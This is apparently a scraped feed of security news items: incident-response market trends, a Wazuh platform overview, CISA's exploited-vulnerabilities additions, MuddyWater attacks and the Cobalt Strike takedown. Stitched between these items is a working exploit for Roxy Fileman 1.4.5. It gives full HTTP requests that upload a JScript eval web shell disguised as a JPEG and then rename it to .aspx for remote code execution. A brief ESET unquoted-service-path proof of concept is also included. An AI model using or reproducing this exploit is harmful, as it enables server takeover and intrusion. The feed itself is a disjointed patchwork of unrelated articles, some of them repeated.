Microsoft and others are doubling down on incident response, adding services and integrating programs to make security analysts and incident response engagements more efficient.

Incident response is shifting from a service that organizations hope they never need to a capability that every business aims to have, and a variety of companies — from consulting firms to insurance companies to cloud providers — are preparing to take advantage of the trend.

In late March, Microsoft announced that the company would focus its generative AI offering, Copilot, on helping companies triage and respond to incidents, with an aim toward bolstering organizations' incident-response capabilities. The company also announced that it would start offering incident response services and consulting on cybersecurity posture as a retainer to companies upon request.

The announcement marks a significant change at Microsoft. In 2019, Microsoft labeled its incident response team — known then as the Detection and Response Team (DART) — as the "cybersecurity team we hope you never meet." Now the team hopes to meet clients on a regular basis.

The moves are about offering the right services to improve incident response capabilities across the board, says Ping Look, director of the Microsoft Incident Response Team.

"We intend to build our customer base and give our customers more flexibility," she says. "Really, I think it's a growth inflection point."

**Building IR Relationships**

Microsoft is not alone. Incident response services have taken off, and the companies that offer them are looking to build relationships rather than one-off engagements. Google bought incident response bellwether Mandiant in 2022, adding to its other incident response-focused acquisitions of Siemplify and Chronicle and its security advisory services. Consulting firms Deloitte, Booz Allen, Kroll, and PricewaterhouseCoopers have long offered incident response, while managed service firms such as CrowdStrike and Secureworks have focused expertise. Large business-technology and service firms — such as IBM, AT&T, Verizon, and Palo Alto Networks — have also long been players in the incident response space.

Even with the extensive list of players, however, the demand for services continues to skyrocket, says Jurgen Kutscher, executive vice president for services at Mandiant.

"The demand always seems to outpace the supply, so I do believe there's plenty of work for all of these organizations because the threats keep changing," he says. "The organizations that are being targeted, especially when you look at much more opportunistic attacks, like ransomware and similar types of attacks — anybody could be a target."

**Incidents Extend into the Cloud**

Microsoft and Google are well-positioned because more attacks are impacting assets in the cloud — in an area where both companies have significant expertise — in part because business infrastructure and data have sprawled out into the cloud, or usually multiple clouds.

A few years ago, for example, a quarter of the attacks investigated by Palo Alto Networks, a network security and incident response provider, involved cloud assets; now, approximately half are cloud-related, says Sam Rubin, vice president of Palo Alto Networks' Unit 42 threat intelligence and incident response group. The company collects more than 500 billion security events per day from endpoint agents, network appliances, and cloud telemetry, he says.

Rubin does not expect that trend to slow, which can make incident response a challenge.

"It's very hard for organizations to only live and operate in one cloud environment, and even if most of your workloads are in the cloud, there are still systems at headquarters, there's still users with endpoints," he says. "We believe that having somebody who can cut across the entire environment, the headquarters, the remote users, and the cloud — whatever the case may be — that is going to remain an important strategy for securing the enterprise."

While Microsoft and other companies aim to use generative AI to process incidents faster and present incident responders with analyses in near real time, the efforts are largely aspirational at this point. Handling that data with large language models (LLMs) and other forms of advanced machine learning will require a great deal of development and learning, says Pete Shoard, vice president at business intelligence firm Gartner.

"Automated response for complex security incidents is absolutely a long, long way out," he says. "Where AI will help greatly is in that area of task-based automation, finding the right kind of information quickly, and providing a lot more information for the humans to be able to do their job more efficiently and effectively."

**Insurance and Legal Remain Driving Forces**

Corporate legal requirements and cyber-insurance policies have an outsized impact on incident response. Often, the first call for an engagement comes not from a company executive, but from an outside counsel hired to handle the crisis (often because attorney-client privilege shields a company from legal discovery). In other cases, an insurance company would bring in incident responders to help reduce the cost of recovering from a breach and to assess the security of a policyholder.

Legal counsel and insurance firms will likely continue to push for incident response retainers as a way to make sure that companies are doing a base level of training and preparation every year. That can create a net benefit, says Jess Burn, a security analyst with Forrester Research.

"Insurance firms are asking if you're doing incident readiness and incident preparedness exercises as part of your application or policy," she says. "Those same incident response firms can do assessments and tabletop exercises at the technical and executive level — and all of those things can help them, and you, really understand your environment."

Overall, companies that have incident response team and a tested incident-response plan save an average of 58% of the costs of mitigating a data breach, or about $2.6 million for large companies, compared with companies that have neither a team nor a well-tested plan, according to IBM's "2022 Cost of a Data Breach" report.

In the end, everyone can save when the incident response firm and the clients have an ongoing relationship, says Mandiant's Kutscher.

"Having organizations consulting with business partners and with cyber-insurance companies so that they don't just put out the fire, but then working with the organization to reduce the risk of having a similar event happen again, is very, very critical," he says. "That's something that the cyber-insurance industry is definitely driving toward."

**The Future Is Pre-Crime (Pre-Incident, That Is)**

Another benefit from the ongoing relationship with an incident response vendor is that companies will know what they need to have in place for effective incident response. With ongoing advice and expertise from incident response firms, when an attack happens, the incident response firm will know the company has retained the right data, which helps immeasurably in the investigation.

"When they do need us for incident response, we are not coming in cold and coming up to speed in a live-fire situation," Palo Alto's Rubin says.

Even companies with their own security operations center, which would not have qualified for Microsoft's DART services, will now be able to put the incident response group on a retainer, says Microsoft's Look.

"We want to be able to take care of our customers, even if they're not using our Microsoft security staff," she says. "Because that's where we primarily deliver our investigations from, using telemetry that comes in through that. But we're expanding well beyond that too — not as fast as I would like, but we're getting there."

Renewed Focus on Incident Response Brings New Competitors and Partnerships

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

The Microsoft Windows kernel suffers from multiple issues with subkeys of transactionally renamed registry keys.

Windows Kernel Registry Key Issue

ESET Service version 16.0.26.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2023-04-05# Vendor : https://www.eset.com# Version : 16.0.26.0# Tested on OS: Microsoft Windows 11 pro x64#PoC :==============C:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET Service 16.0.26.0 Unquoted Service Path

Today, businesses face a variety of security challenges like cyber attacks, compliance requirements, and endpoint security administration. The threat landscape constantly evolves, and it can be overwhelming for businesses to keep up with the latest security trends. Security teams use processes and security solutions to curb these challenges. These solutions include firewalls, antiviruses, data

Today, businesses face a variety of security challenges like cyber attacks, compliance requirements, and endpoint security administration. The threat landscape constantly evolves, and it can be overwhelming for businesses to keep up with the latest security trends. Security teams use processes and security solutions to curb these challenges. These solutions include firewalls, antiviruses, data loss prevention services, and XDRs (Extended Detection and Response).

Wazuh is a free and open source security platform that unifies XDR and SIEM (System Information and Event Management) capabilities. It comprises a universal security agent for event data collection from various sources and the central components for event analysis, correlation, and alerting. The central components include the Wazuh server, dashboard, and indexer. Wazuh offers a suite of modules capable of providing extended threat detection and response for on-premises and cloud workloads.

In this article, we emphasize the capabilities of Wazuh that are beneficial to your organization's security needs.

**Threat intelligence**

Wazuh includes the MITRE ATT&CK module with threat detection rules out-of-the-box. The MITRE ATT&CK module provides details that allow threat hunters to recognize adversary tactics, techniques, and procedures (TTPs). These include details such as the threat groups, software, and mitigation measures. You can use this information to narrow down threats or compromised endpoints in your environment. Wazuh threat detection rules are mapped against their corresponding MITRE ATT&CK IDs.

Fig 1: Wazuh MITRE ATT&CK dashboard

Wazuh integrates seamlessly with third-party threat intelligence solutions like VirusTotal, MISP, URLHaus, and YARA. These integrations enable the checking of file hashes, IP addresses, and URLs against recognized malicious indicators of compromise (IOCs). Wazuh integration with these solutions improves your business' overall security posture by providing additional insights on potential threats, malicious activities, and IOCs.

A Vulnerability is a security weakness or flaw that can be exploited by threats to perform malicious activities in a computer system. Wazuh offers the Vulnerability Detector module to help businesses identify and prioritize vulnerabilities in their environments. This module uses data from multiple feeds such as Canonical, Microsoft, the National Vulnerability Database (NVD), and more to provide real-time information about vulnerabilities.

**Threat detection and response**

Wazuh uses its modules, decoders, ruleset, and integration with third-party solutions to detect and protect your digital assets from threats. These threats include malware, web, network attacks, and more.

The Wazuh File Integrity Monitoring module monitors directories and reports file addition, deletion, and modifications. It is used to audit sensitive files but can be combined with other integrations to detect malware. The rootcheck module is used to detect rootkit behaviors like hidden files, ports, and unusual processes. The Wazuh active response module provides automated response actions such as quarantining infected systems, blocking network traffic, or terminating the ransomware processes. The combination of these modules allows for a quick response to mitigate the impact of cyberattacks.

The image below illustrates the combination of the FIM module, VirusTotal integration, and the active response module in detecting and responding to malware downloaded on a monitored endpoint.

Fig 2: Malicious file detected and deleted from a monitored endpoint

**Audit and regulatory compliance**

Security auditing and compliance are two important concepts for any business that aims to protect itself against cyber attacks. Security auditing is the systematic process of evaluating an organization's information systems, practices, and procedures to identify vulnerabilities, assess risks, and ensure that security controls function as intended. Regulatory compliance refers to the process of certifying that an organization adheres to a set of established standards, regulations, or laws related to information security.

Wazuh helps businesses pass security audits and meet regulatory compliance requirements. Compliance standards offer a set of guidelines and optimal procedures to guarantee the safety of an organization's systems, network, and data. Adhering to these standards helps lower the likelihood of a security breach. Wazuh has various modules that help meet compliance standards like PCI DSS, GDPR, NIST, etc. The post Using the Wazuh SIEM and XDR platform to meet PCI DSS compliance shows how Wazuh plays an important role in maintaining PCI compliance for your organization. The image below shows a Wazuh NIST dashboard.

Fig 3: The Wazuh NIST dashboard

**Cloud security**

Cloud platforms provide services that manage computing, storage, and networking operations through the Internet. Businesses are widely adopting these cloud platforms because of their easy access to resources, flexibility, and high scalability. As more organizations leverage the use of the cloud, maintaining the security of their digital assets remains critical.

Wazuh is a unified XDR and SIEM platform that provides visibility and security monitoring for cloud environments. It monitors and protects cloud services running on Amazon Web Services, Microsoft Azure, and Google Cloud Platform. It achieves this by collecting and analyzing security event data from various cloud components. Such data allows Wazuh to perform vulnerability detection, cloud compliance checks, security monitoring, and automated responses to detected threats.

Fig 4: Wazuh monitoring the AWS CloudTrail service

**Endpoint hardening**

The Wazuh SCA module performs configuration assessments on systems and applications, ensuring the host is secure and the vulnerability surface is reduced. Wazuh uses policy files to scan endpoints for misconfigurations and vulnerabilities. These policy files are included out-of-the-box and based on the Center for Internet Security (CIS) benchmark. The SCA scan results provide insight into the vulnerabilities present on a monitored endpoint. These vulnerabilities range from configuration flaws to installed vulnerable versions of the applications and services. Failed security checks are displayed alongside their remediation, giving system administrators a quick resolution pathway.

Fig 5: Failed SCA check and remediation for a WordPress installation

**Open source**

Wazuh has a fast-growing community where users, developers, and contributors can ask questions about the platform and share collaborative ideas. The Wazuh community provides users with free support, resources, and documentation.

Wazuh, as an open source security platform, provides easy flexibility and customization. Users can modify the source code to suit their specific needs or add new features and capabilities. The Wazuh source code is publicly available on the Wazuh GitHub repository for users that may wish to perform verification checks or contributions.

**Conclusion**

Wazuh is a free and open source platform with robust XDR and SIEM capabilities. With capabilities such as log data analysis, file integrity monitoring, intrusion detection, and automated response, Wazuh gives businesses the ability to quickly and effectively respond to security incidents.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Protecting your business with Wazuh: The open source security platform

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.
This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands

Software Security / Cyber Threat

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.

This includes three high-severity flaws in the Veritas Backup Exec Agent software (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) that could lead to the execution of privileged commands on the underlying system. The flaws were fixed in a patch released by Veritas in March 2021.

*   **CVE-2021-27876** (CVSS score: 8.1) - Veritas Backup Exec Agent File Access Vulnerability
*   **CVE-2021-27877** (CVSS score: 8.2) - Veritas Backup Exec Agent Improper Authentication Vulnerability
*   **CVE-2021-27878** (CVSS score: 8.8) - Veritas Backup Exec Agent Command Execution Vulnerability

Google-owned Mandiant, in a report published last week, revealed that an affiliate associated with the BlackCat (aka ALPHV and Noberus) ransomware operation is targeting publicly exposed Veritas Backup Exec installations to gain initial access by leveraging the aforementioned three bugs.

The threat intelligence firm, which is tracking the affiliate actor under its uncategorized moniker UNC4466, said it first observed exploitation of the flaws in the wild on October 22, 2022.

In one incident detailed by Mandiant, UNC4466 gained access to an internet-exposed Windows server, followed by carrying out a series of actions that allowed the attacker to deploy the Rust-based ransomware payload, but not before conducting reconnaissance, escalating privileges, and disabling Microsoft Defender's real-time monitoring capability.

Also added by CISA to the KEV catalog is CVE-2019-1388 (CVSS score: 7.8), a privilege escalation flaw impacting Microsoft Windows Certificate Dialog that could be exploited to run processes with elevated permissions on an already compromised host.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

The fifth vulnerability included in the list is an information disclosure flaw in Arm Mali GPU Kernel Driver (CVE-2023-26083) that was revealed by Google's Threat Analysis Group (TAG) last month as abused by an unnamed spyware vendor as part of an exploit chain to break into Samsung's Android smartphones.

Federal Civilian Executive Branch Agencies (FCEB) have time till April 28 to apply the patches to secure their networks against potential threats.

The advisory also comes as Apple released updates for iOS, iPadOS, macOS, and Safari web browser to address a pair of zero-day flaws (CVE-2023-28205 and CVE-2023-28206) that it said has been exploited in real-world attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CISA Warns of 5 Actively Exploited Security Flaws: Urgent Action Required

The Iranian nation-state group known as MuddyWater has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.
That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed

The Iranian nation-state group known as **MuddyWater** has been observed carrying out destructive attacks on hybrid environments under the guise of a ransomware operation.

That's according to new findings from the Microsoft Threat Intelligence team, which discovered the threat actor targeting both on-premises and cloud infrastructures in partnership with another emerging activity cluster dubbed **DEV-1084**.

"While the threat actors attempted to masquerade the activity as a standard ransomware campaign, the unrecoverable actions show destruction and disruption were the ultimate goals of the operation," the tech giant revealed Friday.

MuddyWater is the name assigned to an Iran-based actor that the U.S. government has publicly connected to the country's Ministry of Intelligence and Security (MOIS). It's been known to be active since at least 2017.

It's also tracked by the cybersecurity community under various names, including Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mercury, Seedworm, Static Kitten, TEMP.Zagros, and Yellow Nix.

Attacks mounted by the group have primarily singled out Middle Eastern nations, with intrusions observed over the past year leveraging the Log4Shell flaw to breach Israeli entities.

The latest findings from Microsoft reveal the threat actor probably worked together with DEV-1084 to pull off the attack, the latter of which conducted the destructive actions after MuddyWater successfully gained a foothold onto the target environment.

"Mercury likely exploited known vulnerabilities in unpatched applications for initial access before handing off access to DEV-1084 to perform extensive reconnaissance and discovery, establish persistence, and move laterally throughout the network, oftentimes waiting weeks and sometimes months before progressing to the next stage," Microsoft said.

In the activity detected by Redmond, DEV-1084 subsequently abused highly privileged compromised credentials to perform encryption of on-premise devices and large-scale deletion of cloud resources, including server farms, virtual machines, storage accounts, and virtual networks.

Furthermore, the threat actors gained full access to email inboxes through Exchange Web Services, using it to perform "thousands of search activities" and impersonate an unnamed high-ranking employee to send messages to both internal and external recipients.

All these actions are actions are estimated to have transpired over a roughly three-hour timeframe starting at 12:38 a.m. (when the attacker logged into the Microsoft Azure environment via compromised credentials) and ending at 3:21 a.m. (when the attacker sent emails to other parties after the successful cloud disruption).

It's worth noting here that DEV-1084 refers to the same threat actor that assumed the "DarkBit" persona as part of a ransomware and extortion attack aimed at Technion, a leading research university in Israel, in February. The Israel National Cyber Directorate, last month, attributed the attack to MuddyWater.

UPCOMING WEBINAR

Learn to Secure the Identity Perimeter - Proven Strategies

Improve your business security with our upcoming expert-led cybersecurity webinar: Explore Identity Perimeter strategies!

Don't Miss Out – Save Your Seat!

"DEV-1084 \[...\] presented itself as a criminal actor interested in extortion, likely as an attempt to obfuscate Iran's link to and strategic motivation for the attack," Microsoft added.

The links between Mercury and DEV-1084 originate from infrastructure, IP address, and tooling overlaps, with the latter observed using a reverse tunneling utility called Ligolo, a staple MuddyWater artifact.

That said, there is not ample evidence to determine if DEV-1084 operates independently of MuddyWater and collaborates with other Iranian actors, or if it's a sub-team that's only summoned when there is a need to conduct a destructive attack.

Cisco Talos, early last year, described MuddyWater as a "conglomerate" comprising several smaller clusters rather than a single, cohesive group. The emergence of DEV-1084 suggests a nod in this direction.

"While these teams seem to operate independently, they are all motivated by the same factors that align with Iranian national security objectives, including espionage, intellectual theft, and destructive or disruptive operations based on the victims they target," Talos noted in March 2022.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Iran-Based Hackers Caught Carrying Out Destructive Attacks Under Ransomware Guise

By Deeba Ahmed
Cobalt Strike is a legitimate post-exploitation tool designed by Raphael Mudge of Fortra for adversary simulation but it has also been abused by cybercriminals.
This is a post from HackRead.com Read the original post: Microsoft and Fortra to Take Down Malicious Cobalt Strike Infrastructure

**The U.S. District Court for the Eastern District of New York permits Microsoft to seize malicious Cobalt Strike infrastructure used in global malware and ransomware attacks.**

The U.S. District Court for the Eastern District of New York has granted permission for the seizure of domain names used by threat actors to store and share malicious versions of **Cobalt Strike**.

This action follows legal and technical efforts by Microsoft, Health ISAC (Health Information Sharing and Analysis Center), and cybersecurity firm Fortra to prevent the abuse of Microsoft software and the Cobalt Strike exploitation tool.

It is worth noting that in 2019, Microsoft employed a similar approach to **seize 50 domains utilized** by North Korean hacker groups Thallium and APT37 for large-scale cyberattacks.

According to the lawsuit, cybercriminals are utilizing cracked, legacy copies of the post-exploitation tool and Microsoft software to distribute malware and ransomware.

Cobalt Strike, originally **provided by Fortra** for adversary simulation, is a legitimate post-exploitation tool. Despite Fortra’s efforts to prevent abuse, hackers continue to create cracked versions of older product versions and exploit them.

The recent court order enables these organizations to notify and seize IP addresses hosted in the United States that are hosting malicious versions of these tools. The domains will be taken down immediately, and the court order also allows for the ongoing seizure of such domains in the future, as cybercriminals are likely to develop new infrastructure.

Additionally, Microsoft will be notifying hosting providers in the European Union and Latin America to prevent the abuse of **manipulated versions of Cobalt Strike** by taking down host domains.

Microsoft has also stated that its APIs and SDKs have been abused by threat actors in the development and distribution of malware. Therefore, Fortra and Microsoft have obtained temporary restraining orders against the copyright violators of their programs to ensure that malicious versions are shut down and seized.

It is important to note that Cobalt Strike is frequently **used in ransomware attacks**, particularly those targeting the healthcare sector, which is why Health ISAC has been involved in the court proceedings.

An email claiming the Kaseya patch drops Cobalt Strike malware

Recently, the tool has been observed in at least 68 ransomware attacks against healthcare organizations in 19 countries. Profit-driven criminals also use malicious versions of Cobalt Strike to launch ransomware attacks, and state-sponsored actors linked with Russia, China, Vietnam, and Iran are also actively exploiting it.

The action against the abuse of Cobalt Strike and Microsoft software involves disrupting the attackers’ infrastructure, including hosting servers and **domains**. The court order was issued on March 31, and with the assistance of CERTs and ISPs, Microsoft and Fortra have successfully taken down attacker infrastructure and blocked cybercriminals’ access to compromised devices.

In their **lawsuit**, the companies have named sixteen John Does as the plaintiffs, without revealing their identities. The complaint has disclosed that these individuals are members of the Conti, LockBit, and BlackCat ransomware gangs, as well as the Evil Corp cybercrime group.

“Disrupting cracked legacy copies of Cobalt Strike will significantly hinder the monetization of these illegal copies and slow their use in cyberattacks, forcing criminals to re-evaluate and change their tactics,” Microsoft’s Digital Crimes Unit GM, Amy Hogan-Burney stated.

1.  UpdateAgent malware mimics legitimate macOS software
2.  Legitimate tool used in compromising Cloud-based assets
3.  Hackers Using BRc4 Red Team Pentest Tool in Cyberattacks
4.  What Makes External Attack Surface Management Essential?

Microsoft and Fortra to Take Down Malicious Cobalt Strike Infrastructure

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 31 and April 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for March 31 to April 7

The effort aims to disrupt the use of altered Cobalt Strike software by cybercriminals in ransomware and other attacks.

Microsoft's Digital Crimes Unit (DCU), security software vendor Fortra, and the Health Information Sharing and Analysis Center (Health-ISAC), have joined forces to remove cracked legacy copies of Cobalt Strike by way of legal and technical action.

Using dated and maliciously altered versions of the Cobalt Strike software, threat actors have targeted healthcare organizations in nearly 70 ransomware attacks in 19 countries.

Cobalt Strike, sold by Fortra, is a reputable and popular post-exploitation security tool, but its older versions have become a favorite for cybercriminals to employ in nefarious activities. Pulling these legacy copies globally is a new approach for Microsoft's DCU, and it's aimed at cutting off the threat at the source: illegal distribution of compromised, malicious software.

"While this action will impact the criminals' immediate operations, we fully anticipate they will attempt to revive their efforts. Our action is therefore not one and done," Microsoft stated in a blog post. "Through ongoing legal and technical action, Microsoft, Fortra and Health-ISAC, along with our partners, will continue to monitor and take action to disrupt further criminal operations, including the use of cracked copies of Cobalt Strike."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#microsoft